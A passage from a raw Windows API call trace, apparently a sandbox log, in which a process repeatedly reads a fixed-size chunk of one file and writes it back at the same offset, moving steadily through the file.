dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.170] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.171] GetProcessHeap () returned 0x500000 [0089.171] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.171] GetProcessHeap () returned 0x500000 [0089.171] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.171] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa7d8c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.171] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.179] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa7d8c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.179] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.179] GetProcessHeap () returned 0x500000 [0089.179] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.179] GetProcessHeap () returned 0x500000 [0089.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.179] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xaba950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.179] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.188] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xaba950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.188] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.189] GetProcessHeap () returned 0x500000 [0089.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.189] GetProcessHeap () returned 0x500000 [0089.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.189] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xaf79e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.189] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.224] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xaf79e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.224] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.226] GetProcessHeap () returned 0x500000 [0089.226] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.226] GetProcessHeap () returned 0x500000 [0089.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.226] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xb34a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.226] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.236] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xb34a70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.236] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.237] GetProcessHeap () returned 0x500000 [0089.237] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.237] GetProcessHeap () returned 0x500000 [0089.237] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.237] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xb71b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.237] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.249] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xb71b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.249] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.250] GetProcessHeap () returned 0x500000 [0089.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.250] GetProcessHeap () returned 0x500000 [0089.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.250] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xbaeb90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.250] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.260] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xbaeb90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.260] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.261] GetProcessHeap () returned 0x500000 [0089.261] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.261] GetProcessHeap () returned 0x500000 [0089.261] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.261] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xbebc20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.261] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0089.280] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xbebc20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.280] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0089.281] GetProcessHeap () returned 0x500000 [0089.281] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0089.281] GetProcessHeap () returned 0x500000 [0089.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0089.281] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xc28cb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.281] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0101.634] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xc28cb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.634] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0101.634] GetProcessHeap () returned 0x500000 [0101.634] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0101.635] GetProcessHeap () returned 0x500000 [0101.635] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0101.635] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xc65d40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.635] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0101.648] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xc65d40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.648] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0101.648] GetProcessHeap () returned 0x500000 [0101.649] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0101.649] GetProcessHeap () returned 0x500000 [0101.649] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0101.649] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xca2dd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.649] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.585] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xca2dd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.585] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.586] GetProcessHeap () returned 0x500000 [0102.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.586] GetProcessHeap () returned 0x500000 [0102.586] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.586] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xcdfe60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.586] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.594] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xcdfe60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.594] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.595] GetProcessHeap () returned 0x500000 [0102.595] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.595] GetProcessHeap () returned 0x500000 [0102.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.595] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xd1cef0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.595] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.611] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xd1cef0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.612] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.612] GetProcessHeap () returned 0x500000 [0102.612] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.612] GetProcessHeap () returned 0x500000 [0102.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.612] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xd59f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.612] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.642] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xd59f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.643] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.643] GetProcessHeap () returned 0x500000 [0102.643] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.643] GetProcessHeap () returned 0x500000 [0102.643] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.643] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xd97010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.643] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.652] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xd97010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.652] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.652] GetProcessHeap () returned 0x500000 [0102.652] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.653] GetProcessHeap () returned 0x500000 [0102.653] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.653] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xdd40a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.653] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.660] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xdd40a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.660] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.661] GetProcessHeap () returned 0x500000 [0102.661] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.661] GetProcessHeap () returned 0x500000 [0102.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.661] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xe11130, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.661] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.679] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xe11130, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.679] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.680] GetProcessHeap () returned 0x500000 [0102.680] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.680] GetProcessHeap () returned 0x500000 [0102.680] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.680] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xe4e1c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.680] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.688] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xe4e1c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.688] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.689] GetProcessHeap () returned 0x500000 [0102.689] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.689] GetProcessHeap () returned 0x500000 [0102.689] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.689] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xe8b250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.689] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.698] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xe8b250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.698] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.698] GetProcessHeap () returned 0x500000 [0102.698] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.698] GetProcessHeap () returned 0x500000 [0102.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.698] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xec82e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.698] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.706] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xec82e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.707] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.707] GetProcessHeap () returned 0x500000 [0102.707] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.707] GetProcessHeap () returned 0x500000 [0102.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.707] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf05370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.707] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.723] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf05370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.723] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.723] GetProcessHeap () returned 0x500000 [0102.723] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.723] GetProcessHeap () returned 0x500000 [0102.723] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.723] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.724] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.732] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.732] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.733] GetProcessHeap () returned 0x500000 [0102.733] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.733] GetProcessHeap () returned 0x500000 [0102.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.733] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf7f490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.733] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.741] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xf7f490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.741] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.741] GetProcessHeap () returned 0x500000 [0102.741] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.741] GetProcessHeap () returned 0x500000 [0102.741] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.741] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xfbc520, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.741] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 